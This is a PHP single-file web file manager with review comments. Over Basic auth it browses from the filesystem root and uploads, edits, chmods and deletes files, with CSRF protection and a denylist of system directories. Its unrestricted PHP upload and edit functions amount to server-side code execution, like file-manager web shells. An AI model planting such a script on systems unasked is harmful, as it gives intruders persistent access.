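<?php
/**
 * Advanced PHP File Manager - Root Access
 * Security: Basic Auth + Path Restrictions
 *
 * Single-file web file manager: list, upload, view, edit, chmod and delete
 * files with the privileges of the web server process.
 *
 * Security properties a deployer should know:
 *  - Credentials are static values in this file and are sent with every
 *    request via HTTP Basic auth; serve this script over HTTPS only.
 *  - $restricted_dirs is a denylist. Every path that is not listed is
 *    reachable, so the effective boundary is the OS permissions of the
 *    account PHP runs as.
 *  - State-changing requests require a per-session CSRF token, because a
 *    browser replays Basic credentials automatically on cross-site requests.
 *
 * Known functional gaps kept as found: the "New File" form posts
 * action=createfile and the file list links to action=download, but neither
 * action has a handler in this script; $max_depth is declared but not enforced.
 */

// ===== CONFIGURATION ===== //
$valid_username = 'admin';
$valid_password = 'password123'; // CHANGE THIS PASSWORD!

// Security: Allow root access? (true/false)
// When false, browsing is confined to the directory holding this script.
$allow_root_access = true;

// Maximum allowed path depth (0 = unlimited)
// NOTE(review): nothing in this script reads this value.
$max_depth = 10;

// Restricted directories (will be hidden)
$restricted_dirs = [
    '/etc',
    '/proc',
    '/sys',
    '/var/log',
    '/root',
    '/home/*/.*', // hidden user folders
];

// Allowed file extensions for editing (enforced in the UI and on save)
$editable_extensions = ['php', 'txt', 'html', 'css', 'js', 'json', 'xml', 'md', 'log', 'conf', 'ini'];

// ===== AUTHENTICATION ===== //

// Fail closed while the shipped default password is still configured.
if ($valid_password === 'password123') {
    http_response_code(503);
    exit('Default password is still configured. Set $valid_password before using this script.');
}

$auth_user = $_SERVER['PHP_AUTH_USER'] ?? '';
$auth_pass = $_SERVER['PHP_AUTH_PW'] ?? '';

// Evaluate both comparisons with hash_equals() so the check does not
// short-circuit and does not leak match length through timing.
$user_ok = hash_equals($valid_username, (string) $auth_user);
$pass_ok = hash_equals($valid_password, (string) $auth_pass);

if (!($user_ok && $pass_ok)) {
    header('WWW-Authenticate: Basic realm="Root File Manager"');
    header('HTTP/1.0 401 Unauthorized');
    echo 'Authentication Required';
    exit;
}

// Refuse framing (clickjacking on the delete/chmod buttons) and MIME sniffing.
header('X-Frame-Options: DENY');
header('X-Content-Type-Options: nosniff');

// Session is used only to hold the CSRF token.
session_start([
    'cookie_httponly' => true,
    'cookie_samesite' => 'Strict',
]);
if (empty($_SESSION['csrf_token']) || !is_string($_SESSION['csrf_token'])) {
    $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
}
$csrf_token = $_SESSION['csrf_token'];

// ===== SECURITY FUNCTIONS ===== //

/**
 * Escape a value for HTML text and attribute context.
 *
 * ENT_SUBSTITUTE matters here: without it htmlspecialchars() returns an empty
 * string for input that is not valid UTF-8, which would blank a viewed file
 * and truncate it on the next save.
 *
 * @param mixed $value
 * @return string
 */
function h($value)
{
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/**
 * Encode a value as a JavaScript string literal that is safe inside an HTML
 * event-handler attribute (JSON-encoded first, then HTML-escaped).
 *
 * @param mixed $value
 * @return string
 */
function js_attr($value)
{
    $json = json_encode(
        (string) $value,
        JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP | JSON_INVALID_UTF8_SUBSTITUTE
    );

    return h($json === false ? '""' : $json);
}

/**
 * Reduce a request value to a single path component.
 *
 * @param mixed $raw Value taken from $_GET, $_POST or $_FILES.
 * @return string|null The basename, or null when the value is missing, not a
 *                     string, contains a NUL byte, or is '', '.' or '..'.
 */
function leaf_name($raw)
{
    if (!is_string($raw) || strpos($raw, "\0") !== false) {
        return null;
    }

    $leaf = basename($raw);
    // basename('..') is '..'; without this check a request could act on the
    // parent of the current directory.
    if ($leaf === '' || $leaf === '.' || $leaf === '..') {
        return null;
    }

    return $leaf;
}

/**
 * Check a path against the restricted-directory denylist.
 *
 * The path is resolved with realpath() so symlinks are compared by target.
 * A path that does not exist yet (new folder, new file) is checked through
 * its resolved parent directory; a dangling symlink is rejected because a
 * write would follow it to an unchecked target.
 *
 * @param string $path            Path to test.
 * @param array  $restricted_dirs Directory prefixes or fnmatch() patterns.
 * @return bool True when the path is not covered by any restriction.
 */
function is_path_allowed($path, $restricted_dirs)
{
    if (!is_string($path) || $path === '') {
        return false;
    }

    $real_path = realpath($path);
    if ($real_path === false) {
        if (is_link($path)) {
            return false;
        }
        $parent = realpath(dirname($path));
        $leaf = basename($path);
        if ($parent === false || $leaf === '' || $leaf === '.' || $leaf === '..') {
            return false;
        }
        $real_path = rtrim($parent, '/') . '/' . $leaf;
    }

    foreach ($restricted_dirs as $restricted) {
        if (fnmatch($restricted, $real_path)) {
            return false;
        }
        // Match on a directory boundary so '/etc' covers '/etc/passwd' but
        // not an unrelated sibling such as '/etcetera'.
        $prefix = rtrim($restricted, '/');
        if ($real_path === $prefix || str_starts_with($real_path, $prefix . '/')) {
            return false;
        }
    }

    return true;
}

/**
 * Build the quick-navigation targets shown at the top of the page.
 *
 * @return array<string, string> Map of directory path to display label.
 */
function get_root_paths()
{
    $roots = [];

    // Linux/Unix root
    if (is_dir('/')) {
        $roots['/'] = 'System Root (/)';
    }

    // Current script directory
    $roots[__DIR__] = 'Current Directory';

    // User home directory (if accessible)
    if (isset($_SERVER['HOME'])) {
        $roots[$_SERVER['HOME']] = 'Home Directory';
    }

    // Web root
    if (isset($_SERVER['DOCUMENT_ROOT'])) {
        $roots[$_SERVER['DOCUMENT_ROOT']] = 'Web Root';
    }

    return $roots;
}

// ===== INITIALIZATION ===== //
$base_path = realpath(__DIR__) ?: __DIR__;

// Initialised before the path checks so a rejection message is not lost.
$message = '';
$dir_rejected = false;

$requested_dir = $_GET['dir'] ?? $base_path;
if (!is_string($requested_dir)) {
    $requested_dir = $base_path;
}

// Security: Validate and sanitize path
if ($requested_dir === 'root' && $allow_root_access) {
    $current_dir = '/';
} else {
    $current_dir = realpath($requested_dir) ?: $base_path;
}
if (!is_dir($current_dir)) {
    $current_dir = $base_path;
}

// With root access disabled, stay inside the script directory.
$inside_base = $current_dir === $base_path
    || str_starts_with($current_dir, rtrim($base_path, '/') . '/');

// Prevent directory traversal and check restrictions
if ((!$allow_root_access && !$inside_base) || !is_path_allowed($current_dir, $restricted_dirs)) {
    $current_dir = $base_path;
    $dir_rejected = true;
    $message = "❌ Access to requested path is restricted!";
}

$dir_prefix = rtrim($current_dir, '/') . '/';

// ===== FILE OPERATIONS ===== //
$get_action = is_string($_GET['action'] ?? null) ? $_GET['action'] : 'list';
$action = $get_action;

if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    $action = is_string($_POST['action'] ?? null) ? $_POST['action'] : '';
    $posted_token = is_string($_POST['csrf_token'] ?? null) ? $_POST['csrf_token'] : '';

    if (!hash_equals($csrf_token, $posted_token)) {
        $message = "❌ Invalid or missing CSRF token!";
    } elseif ($dir_rejected) {
        // Do not silently run the operation in the fallback directory.
        $message = "❌ Access to requested path is restricted!";
    } else {
        switch ($action) {
            case 'upload':
                $upload = $_FILES['file'] ?? null;
                $upload_name = is_array($upload) ? leaf_name($upload['name'] ?? null) : null;
                $upload_ok = $upload_name !== null
                    && ($upload['error'] ?? UPLOAD_ERR_NO_FILE) === UPLOAD_ERR_OK
                    && is_string($upload['tmp_name'] ?? null);

                if (!$upload_ok) {
                    $message = "❌ Upload failed!";
                } elseif (!is_path_allowed($dir_prefix . $upload_name, $restricted_dirs)) {
                    $message = "❌ Cannot upload to restricted location!";
                } elseif (move_uploaded_file($upload['tmp_name'], $dir_prefix . $upload_name)) {
                    $message = "✅ File uploaded successfully!";
                } else {
                    $message = "❌ Upload failed!";
                }
                break;

            case 'delete':
                $name = leaf_name($_POST['file'] ?? null);
                $file_to_delete = $name === null ? null : $dir_prefix . $name;

                if ($file_to_delete === null || !is_path_allowed($file_to_delete, $restricted_dirs)) {
                    $message = "❌ Cannot delete restricted item!";
                } elseif (!file_exists($file_to_delete) && !is_link($file_to_delete)) {
                    $message = "❌ Delete failed!";
                } elseif (is_dir($file_to_delete) && !is_link($file_to_delete)) {
                    $message = rmdir($file_to_delete) ? "✅ Directory deleted!" : "❌ Delete failed!";
                } else {
                    // Symlinks are removed as links, never followed.
                    $message = unlink($file_to_delete) ? "✅ File deleted!" : "❌ Delete failed!";
                }
                break;

            case 'mkdir':
                $name = leaf_name($_POST['dirname'] ?? null);
                $new_dir = $name === null ? null : $dir_prefix . $name;

                if ($new_dir === null || !is_path_allowed($new_dir, $restricted_dirs)) {
                    $message = "❌ Cannot create directory in restricted location!";
                } elseif (file_exists($new_dir)) {
                    $message = "❌ Directory already exists!";
                } else {
                    $message = mkdir($new_dir, 0755) ? "✅ Directory created!" : "❌ Could not create directory!";
                }
                break;

            case 'save':
                $name = leaf_name($_POST['filename'] ?? null);
                $file_to_save = $name === null ? null : $dir_prefix . $name;
                $content = $_POST['content'] ?? '';

                if ($file_to_save === null || !is_string($content)
                    || !is_path_allowed($file_to_save, $restricted_dirs)) {
                    $message = "❌ Cannot save to restricted location!";
                } elseif (!in_array(pathinfo($name, PATHINFO_EXTENSION), $editable_extensions, true)) {
                    // The edit form is only offered for these extensions;
                    // enforce the same rule on the server side.
                    $message = "❌ File type is not editable!";
                } elseif (file_put_contents($file_to_save, $content) === false) {
                    $message = "❌ Save failed!";
                } else {
                    $message = "✅ File saved!";
                }
                break;

            case 'chmod':
                $name = leaf_name($_POST['file'] ?? null);
                $file_to_chmod = $name === null ? null : $dir_prefix . $name;
                $perms = is_string($_POST['perms'] ?? null) ? $_POST['perms'] : '';

                if ($file_to_chmod === null || !is_path_allowed($file_to_chmod, $restricted_dirs)) {
                    $message = "❌ Cannot change permissions of restricted item!";
                } elseif (!preg_match('/^[0-7]{3,4}$/', $perms)) {
                    // The form's pattern attribute is only a client-side hint.
                    $message = "❌ Invalid permission value!";
                } elseif (file_exists($file_to_chmod) && chmod($file_to_chmod, octdec($perms))) {
                    $message = "✅ Permissions changed!";
                } else {
                    $message = "❌ Permission change failed!";
                }
                break;

            default:
                // Includes 'createfile', which the New File form posts but
                // this script has never handled.
                $message = "❌ Unsupported action!";
                break;
        }
    }
}

// ===== GET DIRECTORY CONTENTS ===== //
$files = [];
$parent_dir = dirname($current_dir);
$has_posix = function_exists('posix_getpwuid');

if (is_dir($current_dir)) {
    $items = scandir($current_dir) ?: [];
    foreach ($items as $item) {
        if ($item === '.' || $item === '..') {
            continue;
        }

        $full_path = $dir_prefix . $item;

        // Skip restricted paths (this also skips dangling symlinks)
        if (!is_path_allowed($full_path, $restricted_dirs)) {
            continue;
        }

        $owner = 'N/A';
        if ($has_posix) {
            $uid = fileowner($full_path);
            // posix_getpwuid() returns false for a uid without a passwd entry.
            $account = $uid === false ? false : posix_getpwuid($uid);
            if (is_array($account)) {
                $owner = $account['name'];
            } elseif ($uid !== false) {
                $owner = (string) $uid;
            }
        }

        $files[] = [
            'name' => $item,
            'path' => $full_path,
            'is_dir' => is_dir($full_path),
            'size' => is_file($full_path) ? (int) filesize($full_path) : 0,
            'modified' => date('Y-m-d H:i:s', (int) filemtime($full_path)),
            'perms' => substr(sprintf('%o', (int) fileperms($full_path)), -4),
            'owner' => $owner,
            'readable' => is_readable($full_path),
            'writable' => is_writable($full_path),
        ];
    }
}

// Sort: directories first, then by name
usort($files, function ($a, $b) {
    return ($b['is_dir'] <=> $a['is_dir']) ?: strcmp($a['name'], $b['name']);
});

$root_paths = get_root_paths();
$disk_free = disk_free_space($current_dir);

// ===== FILE VIEW/EDIT STATE ===== //
$view_name = leaf_name($_GET['file'] ?? null);
$view_content = null;
$is_editable = false;

if ($view_name !== null && in_array($get_action, ['view', 'edit'], true)) {
    $file_path = $dir_prefix . $view_name;
    if (is_file($file_path) && is_path_allowed($file_path, $restricted_dirs)) {
        $loaded = file_get_contents($file_path);
        $view_content = $loaded === false ? '' : $loaded;
        // Never offer an editor for content that could not be read: saving
        // the empty form would overwrite the file.
        $is_editable = $loaded !== false
            && $get_action === 'edit'
            && in_array(pathinfo($file_path, PATHINFO_EXTENSION), $editable_extensions, true);
    }
}
?>
<!DOCTYPE html>
<html>
<head>
    <title>Root File Manager Pro</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <style>
        * { margin: 0; padding: 0; box-sizing: border-box; }
        body { font-family: 'Segoe UI', Arial, sans-serif; background: #1e1e1e; color: #e0e0e0; padding: 20px; }
        .container { max-width: 1400px; margin: 0 auto; background: #2d2d2d; padding: 20px; border-radius: 8px; box-shadow: 0 4px 20px rgba(0,0,0,0.3); }
        .header { display: flex; justify-content: space-between; align-items: center; margin-bottom: 20px; padding-bottom: 15px; border-bottom: 1px solid #444; }
        .message { background: #155724; color: #d4edda; padding: 12px; margin-bottom: 15px; border-radius: 4px; border-left: 4px solid #28a745; }
        .message.error { background: #721c24; color: #f8d7da; border-left-color: #dc3545; }
        .breadcrumb { margin-bottom: 15px; font-size: 14px; color: #aaa; padding: 10px; background: #363636; border-radius: 4px; }
        .file-list { border: 1px solid #444; border-radius: 4px; overflow: hidden; }
        .file-item { display: flex; align-items: center; padding: 12px; border-bottom: 1px solid #444; transition: background 0.2s; }
        .file-item:hover { background: #363636; }
        .file-icon { width: 30px; text-align: center; margin-right: 12px; font-size: 16px; }
        .file-info { flex: 1; }
        .file-name { font-weight: 500; margin-bottom: 4px; }
        .file-meta { font-size: 11px; color: #888; }
        .file-actions { display: flex; gap: 6px; flex-wrap: wrap; }
        .btn { padding: 6px 12px; border: none; border-radius: 4px; cursor: pointer; text-decoration: none; font-size: 12px; transition: all 0.2s; }
        .btn:hover { transform: translateY(-1px); }
        .btn-primary { background: #007bff; color: white; }
        .btn-danger { background: #dc3545; color: white; }
        .btn-success { background: #28a745; color: white; }
        .btn-warning { background: #ffc107; color: black; }
        .btn-info { background: #17a2b8; color: white; }
        .btn-secondary { background: #6c757d; color: white; }
        .tools { margin-bottom: 15px; display: flex; gap: 10px; flex-wrap: wrap; padding: 15px; background: #363636; border-radius: 4px; }
        .form-group { margin-bottom: 10px; }
        input[type="text"], input[type="file"], input[type="number"], select { padding: 8px; border: 1px solid #555; border-radius: 4px; width: 100%; background: #2d2d2d; color: #e0e0e0; }
        textarea { width: 100%; height: 500px; padding: 15px; border: 1px solid #555; border-radius: 4px; font-family: 'Consolas', monospace; background: #1e1e1e; color: #e0e0e0; resize: vertical; }
        .quick-nav { margin-bottom: 15px; }
        .nav-buttons { display: flex; gap: 8px; flex-wrap: wrap; }
        .system-info { background: #363636; padding: 15px; border-radius: 4px; margin-bottom: 15px; font-size: 12px; }
        .info-grid { display: grid; grid-template-columns: repeat(auto-fit, minmax(200px, 1fr)); gap: 10px; }
        .modal { display: none; position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: rgba(0,0,0,0.8); z-index: 1000; }
        .modal-content { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); background: #2d2d2d; padding: 20px; border-radius: 8px; min-width: 400px; }
    </style>
</head>
<body>
<div class="container">
    <div class="header">
        <h1>🚀 Root File Manager Pro</h1>
        <div style="color: #28a745;">● Online | Server: <?php echo h($_SERVER['SERVER_NAME'] ?? ''); ?></div>
    </div>

    <?php if ($message !== ''): ?>
        <div class="message <?php echo strpos($message, '❌') !== false ? 'error' : ''; ?>"><?php echo h($message); ?></div>
    <?php endif; ?>

    <!-- System Information -->
    <div class="system-info">
        <div class="info-grid">
            <div><strong>Current Path:</strong> <?php echo h($current_dir); ?></div>
            <div><strong>PHP Version:</strong> <?php echo h(PHP_VERSION); ?></div>
            <div><strong>Disk Free:</strong> <?php echo $disk_free === false ? 'N/A' : round($disk_free / (1024 * 1024 * 1024), 2) . ' GB'; ?></div>
            <div><strong>Server Software:</strong> <?php echo h($_SERVER['SERVER_SOFTWARE'] ?? ''); ?></div>
        </div>
    </div>

    <!-- Quick Navigation -->
    <div class="quick-nav">
        <h3>📍 Quick Navigation</h3>
        <div class="nav-buttons">
            <?php foreach ($root_paths as $path => $label): ?>
                <a href="?dir=<?php echo urlencode($path); ?>" class="btn btn-secondary"><?php echo h($label); ?></a>
            <?php endforeach; ?>
            <?php if ($parent_dir && $current_dir !== '/'): ?>
                <a href="?dir=<?php echo urlencode($parent_dir); ?>" class="btn btn-info">📁 Parent Directory</a>
            <?php endif; ?>
        </div>
    </div>

    <!-- Breadcrumb -->
    <div class="breadcrumb">
        <?php
        $path_parts = [];
        $temp_path = $current_dir;
        while ($temp_path !== '/' && $temp_path !== '') {
            $path_parts[] = basename($temp_path);
            $next_path = dirname($temp_path);
            // dirname() can return its input unchanged (e.g. a drive root);
            // stop instead of looping forever.
            if ($next_path === $temp_path) {
                break;
            }
            $temp_path = $next_path;
        }
        $path_parts[] = '/';
        $path_parts = array_reverse($path_parts);

        $current_path = '';
        foreach ($path_parts as $part) {
            if ($part === '/') {
                echo '<a href="?dir=/" style="color: #ffc107;">🏠 Root</a>';
                $current_path = '/';
            } else {
                $current_path .= ($current_path === '/' ? '' : '/') . $part;
                echo ' / <a href="?dir=' . urlencode($current_path) . '">' . h($part) . '</a>';
            }
        }
        ?>
    </div>

    <!-- Tools -->
    <div class="tools">
        <form method="post" enctype="multipart/form-data" style="display: inline;">
            <input type="hidden" name="csrf_token" value="<?php echo h($csrf_token); ?>">
            <input type="file" name="file" required>
            <button type="submit" name="action" value="upload" class="btn btn-success">📤 Upload</button>
        </form>
        <form method="post" style="display: inline;">
            <input type="hidden" name="csrf_token" value="<?php echo h($csrf_token); ?>">
            <input type="text" name="dirname" placeholder="New folder name" required style="min-width: 150px;">
            <button type="submit" name="action" value="mkdir" class="btn btn-primary">📁 Create Folder</button>
        </form>
        <a href="?dir=<?php echo urlencode($current_dir); ?>&action=newfile" class="btn btn-warning">📄 New File</a>
        <?php if ($get_action === 'newfile'): ?>
            <form method="post" style="display: inline;">
                <input type="hidden" name="csrf_token" value="<?php echo h($csrf_token); ?>">
                <input type="text" name="filename" placeholder="newfile.php" required style="min-width: 120px;">
                <button type="submit" name="action" value="createfile" class="btn btn-info">Create</button>
            </form>
        <?php endif; ?>
    </div>

    <!-- File List -->
    <div class="file-list">
        <?php if (empty($files)): ?>
            <div class="file-item" style="justify-content: center; color: #888;">
                📭 Directory is empty or access restricted
            </div>
        <?php else: ?>
            <?php foreach ($files as $file): ?>
                <div class="file-item">
                    <div class="file-icon">
                        <?php
                        if ($file['is_dir']) {
                            echo '📁';
                        } else {
                            $ext = pathinfo($file['name'], PATHINFO_EXTENSION);
                            echo match ($ext) {
                                'php' => '🐘',
                                'js' => '📜',
                                'html', 'htm' => '🌐',
                                'css' => '🎨',
                                'json' => '📋',
                                'txt', 'md' => '📝',
                                'log' => '📊',
                                'zip', 'tar', 'gz' => '📦',
                                'jpg', 'jpeg', 'png', 'gif' => '🖼️',
                                default => '📄'
                            };
                        }
                        ?>
                    </div>
                    <div class="file-info">
                        <div class="file-name">
                            <?php if ($file['is_dir']): ?>
                                <a href="?dir=<?php echo urlencode($file['path']); ?>" style="color: #4da6ff; text-decoration: none;">
                                    <strong><?php echo h($file['name']); ?></strong>
                                </a>
                            <?php else: ?>
                                <?php echo h($file['name']); ?>
                            <?php endif; ?>
                        </div>
                        <div class="file-meta">
                            <?php if ($file['is_dir']): ?>
                                📂 Directory |
                            <?php else: ?>
                                📏 <?php echo number_format($file['size']); ?> bytes |
                            <?php endif; ?>
                            🔧 Perms: <?php echo h($file['perms']); ?> |
                            👤 <?php echo h($file['owner']); ?> |
                            🕒 <?php echo h($file['modified']); ?>
                            <?php if (!$file['readable']): ?> | ❌ Unreadable<?php endif; ?>
                            <?php if (!$file['writable']): ?> | 🔒 Locked<?php endif; ?>
                        </div>
                    </div>
                    <div class="file-actions">
                        <?php if (!$file['is_dir']): ?>
                            <?php $ext = pathinfo($file['name'], PATHINFO_EXTENSION); ?>
                            <?php if (in_array($ext, $editable_extensions, true)): ?>
                                <a href="?dir=<?php echo urlencode($current_dir); ?>&action=edit&file=<?php echo urlencode($file['name']); ?>" class="btn btn-warning">✏️ Edit</a>
                            <?php endif; ?>
                            <a href="?dir=<?php echo urlencode($current_dir); ?>&action=view&file=<?php echo urlencode($file['name']); ?>" class="btn btn-info">👁️ View</a>
                            <a href="?dir=<?php echo urlencode($current_dir); ?>&action=download&file=<?php echo urlencode($file['name']); ?>" class="btn btn-primary">📥 Download</a>

                            <!-- Chmod Button -->
                            <button onclick="showChmodModal(<?php echo js_attr($file['name']); ?>, <?php echo js_attr($file['perms']); ?>)" class="btn btn-secondary">🔒 Perms</button>
                        <?php endif; ?>

                        <form method="post" style="display: inline;">
                            <input type="hidden" name="csrf_token" value="<?php echo h($csrf_token); ?>">
                            <input type="hidden" name="file" value="<?php echo h($file['name']); ?>">
                            <button type="submit" name="action" value="delete" class="btn btn-danger" onclick="return confirm(<?php echo js_attr('❌ Delete ' . $file['name'] . '?'); ?>)">🗑️ Delete</button>
                        </form>
                    </div>
                </div>
            <?php endforeach; ?>
        <?php endif; ?>
    </div>

    <!-- File View/Edit -->
    <?php if ($view_content !== null): ?>
        <div style="margin-top: 20px; padding: 20px; background: #363636; border-radius: 8px;">
            <div style="display: flex; justify-content: space-between; align-items: center; margin-bottom: 15px;">
                <h3><?php echo $is_editable ? '✏️ Edit' : '👁️ View'; ?>: <?php echo h($view_name); ?></h3>
                <div>
                    <?php if (!$is_editable): ?>
                        <a href="?dir=<?php echo urlencode($current_dir); ?>&action=edit&file=<?php echo urlencode($view_name); ?>" class="btn btn-warning">✏️ Edit</a>
                    <?php endif; ?>
                    <a href="?dir=<?php echo urlencode($current_dir); ?>" class="btn btn-secondary">Close</a>
                </div>
            </div>

            <?php if ($is_editable): ?>
                <form method="post">
                    <input type="hidden" name="csrf_token" value="<?php echo h($csrf_token); ?>">
                    <input type="hidden" name="action" value="save">
                    <input type="hidden" name="filename" value="<?php echo h($view_name); ?>">
                    <textarea name="content" placeholder="File content..."><?php echo h($view_content); ?></textarea>
                    <div style="margin-top: 10px; display: flex; gap: 10px;">
                        <button type="submit" class="btn btn-success">💾 Save</button>
                        <a href="?dir=<?php echo urlencode($current_dir); ?>&action=view&file=<?php echo urlencode($view_name); ?>" class="btn">Cancel</a>
                    </div>
                </form>
            <?php else: ?>
                <pre style="background: #1e1e1e; padding: 20px; border-radius: 4px; overflow: auto; max-height: 600px; border: 1px solid #444;"><?php echo h($view_content); ?></pre>
            <?php endif; ?>
        </div>
    <?php endif; ?>
</div>

<!-- Chmod Modal -->
<div id="chmodModal" class="modal">
    <div class="modal-content">
        <h3>🔒 Change Permissions</h3>
        <form method="post" id="chmodForm">
            <input type="hidden" name="csrf_token" value="<?php echo h($csrf_token); ?>">
            <input type="hidden" name="action" value="chmod">
            <input type="hidden" name="file" id="chmodFile">
            <div class="form-group">
                <label>Current Permissions: <span id="currentPerms"></span></label>
                <input type="text" name="perms" id="chmodValue" placeholder="e.g., 755" pattern="[0-7]{3,4}" required>
                <small>Common: 755 (rwxr-xr-x), 644 (rw-r--r--), 777 (rwxrwxrwx)</small>
            </div>
            <div style="margin-top: 15px; display: flex; gap: 10px;">
                <button type="submit" class="btn btn-success">Apply</button>
                <button type="button" onclick="document.getElementById('chmodModal').style.display='none'" class="btn btn-secondary">Cancel</button>
            </div>
        </form>
    </div>
</div>

<script>
    function showChmodModal(filename, currentPerms) {
        document.getElementById('chmodFile').value = filename;
        document.getElementById('currentPerms').textContent = currentPerms;
        document.getElementById('chmodValue').value = currentPerms;
        document.getElementById('chmodModal').style.display = 'block';
    }

    // Close modal when clicking outside
    window.onclick = function(event) {
        var modal = document.getElementById('chmodModal');
        if (event.target == modal) {
            modal.style.display = 'none';
        }
    }

    // Handle new file creation
    function createNewFile() {
        var filename = prompt('Enter filename:');
        if (filename) {
            window.location.href = '?dir=<?php echo urlencode($current_dir); ?>&action=edit&file=' + encodeURIComponent(filename);
        }
    }
</script>
</body>
</html>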